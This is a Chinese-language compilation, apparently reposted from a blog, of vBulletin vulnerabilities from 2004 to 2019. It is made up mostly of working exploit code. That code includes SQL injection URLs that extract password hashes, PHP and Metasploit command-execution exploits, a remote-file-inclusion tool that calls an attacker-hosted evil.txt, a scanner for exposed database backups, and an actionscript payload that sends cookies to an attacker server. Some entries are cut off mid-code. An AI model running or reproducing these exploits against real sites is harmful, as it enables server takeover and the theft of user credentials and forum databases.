SSV-15384
Date:
2004.11
漏洞类别:
SQL 注入
PoC:
http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
SSV-15476
Date: 2005.2
漏洞类别:
RCE
EXP: <?php /************************************************************** # # vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net # # First condition : $vboptions[‘showforumusers‘] == True , the admin must set # showforumusers ON in vbulletin options. # Second condition: $bbuserinfo[‘userid‘] == 0 , you must be an visitor/guest . # Third condition : $DB_site->fetch_array($forumusers) == True , when you # visit the forums, it must has at least # one user show the forum. # Fourth condition: magic_quotes_gpc must be OFF # # Vulnerable Systems: # vBulletin version 3.0 up to and including version 3.0.4 # # Immune systems: # vBulletin version 3.0.5 # vBulletin version 3.0.6 # **************************************************************/ if (!(function_exists(‘curl_init‘))) { echo "cURL extension required\n"; exit; } if ($argv[3]){ $url = $argv[1]; $forumid = intval($argv[2]); $command = $argv[3]; } else { echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n"; echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n"; echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n"; echo "<forumid> forum id\n"; echo "<command> command to execute on server (ex: ‘ls -la‘)\n"; echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n"; echo "ex :\n"; echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\""; exit; } if ($argv[4]) $proxy = $argv[4]; $action = ‘forumdisplay.php?GLOBALS[]=1&f=‘.$forumid.‘&comma=".`echo _START_`.`‘.$command.‘`.`echo _END_`."‘; $ch=curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.‘/‘.$action); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $res = substr($res, strpos($res, ‘_START_‘)+7); $res = substr($res,0, strpos($res, ‘_END_‘)); echo $res; ?>
SSV-15482
Date: 2005.2 类型: RCE PoC: # Tested on vBulletin Version 3.0.1 /str0ke # http://www.xxx.net/misc.php?do=page&template={${system(id)}} # # [SCAN Associates Security Advisory] # http://www.scan-associates.net Proof of concept ================ http://site.com/misc.php?do=page&template={${phpinfo()}}
SSV-15475
Date: 2005.2 Exploit: ---------------- http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system(‘id‘)." Conditions: ---------------- 1st condition : $vboptions[‘showforumusers‘] == True , the admin must set showforumusers ON in vbulletin options. 2nd condition : $bbuserinfo[‘userid‘] == 0 , you must be an visitor/guest. 3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum. 4th condition : magic_quotes_gpc must be OFF SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;)))
SSV-15647
Date: 2005.8 类型: RCE PoC: ## # Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit # Name: php_vb3_0_6.pm # License: Artistic/BSD/GPL # Info: trying to get the command execution exploits out of the way on milw0rm.com. M‘s are always good. # # # - This is an exploit module for the Metasploit Framework, please see # http://metasploit.com/projects/Framework for more information. ## package Msf::Exploit::php_vb3_0_6; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { ‘Name‘ => ‘vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit‘, ‘Version‘ => ‘$Revision: 1.0 $‘, ‘Authors‘ => [ ‘str0ke‘ ], ‘Arch‘ => [ ], ‘OS‘ => [ ], ‘Priv‘ => 0, ‘UserOpts‘ => { ‘RHOST‘ => [1, ‘ADDR‘, ‘The target address‘], ‘RPORT‘ => [1, ‘PORT‘, ‘The target port‘, 80], ‘VHOST‘ => [0, ‘DATA‘, ‘The virtual host name of the server‘], ‘RPATH‘ => [1, ‘DATA‘, ‘Path to the misc.php script‘, ‘/forum/misc.php‘], ‘SSL‘ => [0, ‘BOOL‘, ‘Use SSL‘], }, ‘Description‘ => Pex::Text::Freeform(qq{ This module exploits a code execution flaw in vBulletin <= 3.0.6. }), ‘Refs‘ => [ [‘MIL‘, ‘832‘], ], ‘Payload‘ => { ‘Space‘ => 512, ‘Keys‘ => [‘cmd‘, ‘cmd_bash‘], }, ‘Keys‘ => [‘vBulletin‘], }; sub new { my $class = shift; my $self = $class->SUPER::new({‘Info‘ => $info, ‘Advanced‘ => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar(‘RHOST‘); my $target_port = $self->GetVar(‘RPORT‘); my $vhost = $self->GetVar(‘VHOST‘) || $target_host; my $path = $self->GetVar(‘RPATH‘); my $cmd = $self->GetVar(‘EncodedPayload‘)->RawPayload; # Encode the command as a set of chr() function calls my $byte = join(‘.‘, map { $_ = ‘chr(‘.$_.‘)‘ } unpack(‘C*‘, $cmd)); # Create the get request data my $data = "?do=page&template={\${passthru($byte)}}"; my $req = "GET $path$data HTTP/1.1\r\n". "Host: $vhost:$target_port\r\n". "Content-Type: application/html\r\n". "Content-Length: ". length($data)."\r\n". "Connection: Close\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( ‘PeerAddr‘ => $target_host, ‘PeerPort‘ => $target_port, ‘LocalPort‘ => $self->GetVar(‘CPORT‘), ‘SSL‘ => $self->GetVar(‘SSL‘), ); if ($s->IsError){ $self->PrintLine(‘[*] Error creating socket: ‘ . $s->GetError); return; } $self->PrintLine("[*] Sending the malicious vBulletin Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); return; } 1;
SSV-15669
Date: 2005.8 类型: RCE PoC: /* * Needed to pentest a few vBulletin forums so I wrote this junk real quick. * Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html * Good paths: /forum/ / /forum/archive/ /forum/cpadmin/ * Update 1: Code error fixes. /str0ke (str0ke@milw0rm.com) * Update 2: Fixed datestring-version for international boards by hals1 (h4ls4bschn31d3r@gmx.net) * Update 3: French vBulletin boards added by Tyn0r (tyn0r@atxteam.net) * /str0ke */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> #define SERVER_PORT 80 char *getdate(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m-%d-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } char *getdate2(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y-%d-%m", localtime(&ttt)); printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } char *getdate3(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d-%m-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } char *getdate4(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m.%d.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } char *getdate5(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y.%d.%m", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } char *getdate6(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d.%m.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } char *getdate7(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d%m%Y", localtime(&ttt)); // Tyn0r printf("Searching: forumbackup-%s.sql\n", datestring); return(datestring); } main(int argc, char *argv[]) { char buffer[1000],host[255],path[255],dog[255],c; int sd, rc, i=0, d=0, b; struct sockaddr_in localAddr, servAddr; struct hostent *h; char *http = "Accept: */*\r\n" "Accept-Language: en-us,en;q=0.5\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "User-Agent: we want your backups - milw0rm\r\n" "Connection: close\r\n\r\n"; if ( argc != 5) { printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.com\n"); printf("usage: %s -h hostname/ip -p /path/ \n",argv[0]); exit(0); } while ((c = getopt (argc, argv, "h:p:")) != EOF) switch(c) { case ‘h‘: strncpy(host,optarg,sizeof(host)); break; case ‘p‘: strncpy(path,optarg,sizeof(path)); break; } h = gethostbyname(host); if(h==NULL) { printf("Unknown Host ‘%s‘\n",host); exit(1); } printf("Trying To Connect To [%s]\n",host); while(1){ servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(SERVER_PORT); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Can Not Open The Socket\n"); exit(1); } localAddr.sin_family = AF_INET; localAddr.sin_addr.s_addr = htonl(INADDR_ANY); localAddr.sin_port = htons(0); rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); if(rc<0) { printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT); perror("error "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("cannot connect\n"); exit(1); } memset(buffer,0,sizeof(buffer)); if ( d == 0 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate(i),host,http); } else if ( d == 1 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate2(i),host,http); } else if ( d == 2 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate3(i),host,http); } else if ( d == 3 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate4(i),host,http); } else if ( d == 4 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate5(i),host,http); } else if ( d == 5 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate6(i),host,http); } else if ( d == 6 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate7(i),host,http); } rc = send(sd,buffer, strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); while(1) { rc=recv(sd,buffer,sizeof(buffer),0); if(strstr(buffer,"404")) break; if(strstr(buffer,"200 OK")) { if ( d == 0 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate(i)); } if ( d == 1 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate2(i)); } if ( d == 2 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate3(i)); } if ( d == 3 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate4(i)); } if ( d == 4 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate5(i)); } if ( d == 5 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate6(i)); } if ( d == 6 ) { printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate7(i)); } exit(0); } memset(buffer,0,sizeof(buffer)); } close(sd); if ( d < 6 ) { d++; } else { d=0; i++; } } }
SSV-15743
漏洞类别: SQL 注入 PoC: # Rankings for (name) will state the md5 hash for the user /str0ke # ibProArcade 2.x IPB: index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user] vBulettin forums: index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user] Author: B~HFH Email: bhfh01@gmail.com
SSV-15988
Date: 2006.4 漏洞类别: RCE PoC: <?php /* vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? */ $cmd = $_POST["cmd"]; $turl = $_POST["turl"]; $hurl = $_POST["hurl"]; $form= "<form method=\"post\" action=\"".$PHP_SELF."\">" ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>" ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>" ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>" ."<input type=\"submit\" value=\"Submit\" name=\"submit\">" ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">"; if (!isset($_POST[‘submit‘])) { echo $form; }else{ $file = fopen ("test.txt", "w+"); fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); system(\"echo ++END++\"); ?>"); fclose($file); $file = fopen ($turl.$hurl, "r"); if (!$file) { echo "<p>Unable to get output.\n"; exit; } echo $form; while (!feof ($file)) { $line .= fgets ($file, 1024)."<br>"; } $tpos1 = strpos($line, "++BEGIN++"); $tpos2 = strpos($line, "++END++"); $tpos1 = $tpos1+strlen("++BEGIN++"); $tpos2 = $tpos2-$tpos1; $output = substr($line, $tpos1, $tpos2); echo $output; } ?>
SSV-5410
Date: 2006.10
漏洞类别:
远程溢出
EXP: #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <errno.h> #include <string.h> #include <iostream> using namespace std; string exploit; string answer; string answer2; long s; sockaddr_in addr; char IPaddr[1024]; /*You have to change to the right path*/ char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n"; char stry[41943040]; long I; long M, J, K, L; int i; int main() { cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl; cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl; cout << "> Press 1 for Install_path exploit" << endl; cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl; cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl; cout << "> Programm Author M4k3, www.pldsoft.com" << endl; cout << "> Copyright by PLDsoft.com" << endl; cout << "> Number? "; cin >> exploit; cout << endl; if (exploit == "1") { cout << " ____________________ " << endl; cout << " |---PLDsoft.com------|" << endl; cout << " |--------------------|" << endl; cout << " |-vbulletin 3.5.4---|" << endl; cout << " |install_path exploit|" << endl; cout << " |____________________|" << endl; cout << "##############################################" << endl; cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl; cout << "###############################################" << endl; cout << endl; cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl; cout << "Remote : Yes" << endl; cout << "Critical Level : Dangerous"<< endl; cout << "############################################" << endl; cout << "Affected software description :" << endl; cout << endl; cout << "Application : vbulletin" << endl; cout << "version : latest version [ 3.60 Release 4 ]" << endl; cout << "URL : http://www.vbulletin.com" << endl; cout << endl; cout << "########################################" << endl; cout << "Exploit:" << endl; cout << endl; cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl; cout << endl; cout << "when it works, you can download the database..." << endl; cout << endl; cout << "########################################" << endl; cout << "Contact:" << endl; cout << "Nick: M4k3" << endl; cout << "E-mail: m4k3@pldsoft.com" << endl; cout << "Website: http://www.pldsoft.com" << endl; cout << "_______End of Exploit______" << endl; cout << endl; sleep(1); cout << "Use the exploit now?" << endl; cout << "yes/no: "; cin >> answer; } if (answer == "yes") { cout << "Starting vbulletin 3.5.4 install_path exploit" << endl; { cout << "Insert IP: "; cin >> IPaddr; M = 0; J = 0; K = 0; L = 0; while(IPaddr[i] != 0) { if(IPaddr[i] >= ‘0‘ && IPaddr[i] <= ‘9‘) { L *= 10; L += IPaddr[i] - ‘0‘; K++; if(K > 3) { M = -1; break; } } else if(IPaddr[i] == ‘.‘) { if(K == 0) { M = -1; break; } if(L >= 255) { M = -1; break; } J++; K = 0; L = 0; } else { M = -1; break; } M++; } if(M == -1 || J != 3) { cout << "> Invalid IP-Address!" << endl; return 0; } s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); addr.sin_family = AF_INET; inet_aton(IPaddr, &addr.sin_addr); addr.sin_port = htons(80); if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in))) { printf("Failure: Connection Rested!\r\n"); close(s); return 1; } if(send(s, sget, strlen(sget), 0) == 0) { printf("Failure: Not able to send packets!\r\n"); close(s); return 2; } if((I = recv(s, stry, 41943040, 0)) == 0) { printf("Failure: Not able to receive packets!\r\n"); close(s); return 3; return 0; } close(s); printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I); printf("%s", stry); return 0; } } else if (exploit == "2") { cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl; cout << "=> Author: SpiderZ"<< endl; cout << "=> Sito: www.spiderz.tk"<< endl; cout << endl; cout << "_____________________________________________________________"<< endl; cout << endl; cout << "( 1 )"<< endl; cout << endl; cout << "<?php"<< endl; cout << "$ip_adresse = $_SERVER[‘REMOTE_ADDR‘]; "<< endl; cout << "if(!empty($ip_adresse)) "<< endl; cout << "{ "<< endl; cout << "echo ‘il tuo ip ?: ‘,$ip_adresse; "<< endl; cout << "} "<< endl; cout << "else "<< endl; cout << "{ "<< endl; cout << "echo ‘Impossible d\‘afficher l\‘IP‘; "<< endl; cout << "} "<< endl; cout << "?> "<< endl; cout << endl; cout << "<a href=""log.php""></a><?"<< endl; cout << "$xx1=$HTTP_SERVER_VARS[‘SERVER_PORT‘];"<< endl; cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl; cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl; cout << "else $visitor_info = $REMOTE_HOST;"<< endl; cout << "$base = ‘http://‘ . $HTTP_SERVER_VARS[‘SERVER_NAME‘] . $PHP_SELF;"<< endl; cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl; cout << "$x2=$REMOTE_PORT;"<< endl; cout << "?>"<< endl; cout << endl; cout << "<?php"<< endl;
SSV-402
Date: 2006.11 漏洞类别: 嵌入恶意代码 影响范围: Microsoft IE在处理vBulletin的附件时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行恶意代码。 远程攻击者可以将恶意代码保存为.pdf文件并在张贴时做为附件上传到论坛,这样用户在IE中打开附件时就会导致执行任意代码。 VBulletin VBulletin 3.5.4 目前厂商还没有提供补丁或者升级程序
SSV-1033
Date: 2006.12 漏洞类别: SQL 注入 影响范围: vBulletin在处理恶意SWF文件时存在漏洞,远程攻击者可能利用此漏洞获取用户机器的敏感信息。 如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话,就可能执行跨站脚本攻击,导致在日志文件中泄露基于cookie的认证凭据。 VBulletin VBulletin <= 3.6.4 目前厂商还没有提供补丁或者升级程序 PoC: getURL("javascript:function blab(){}var scriptNode = document.createElement(‘script‘);document.getElementsByTagName(‘body‘)[0].appendChild(scriptNode);scriptNode.language=‘javascript‘;scriptNode.src=‘http://www.YourServer/UrPHPpage.php?Cookie=‘+
CVE-2019-16759
vBulletin 5.x 0day pre-auth RCE exploit
类型: RCE Date: 2019.9 PoC: https://seclists.org/fulldisclosure/2019/Sep/31
CVE-2019-17132
类型:
SQL | RCE
影响范围:
vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
EXP |Patch released:
https://www.exploit-db.com/exploits/47475
原文:https://www.cnblogs.com/AtesetEnginner/p/11662507.html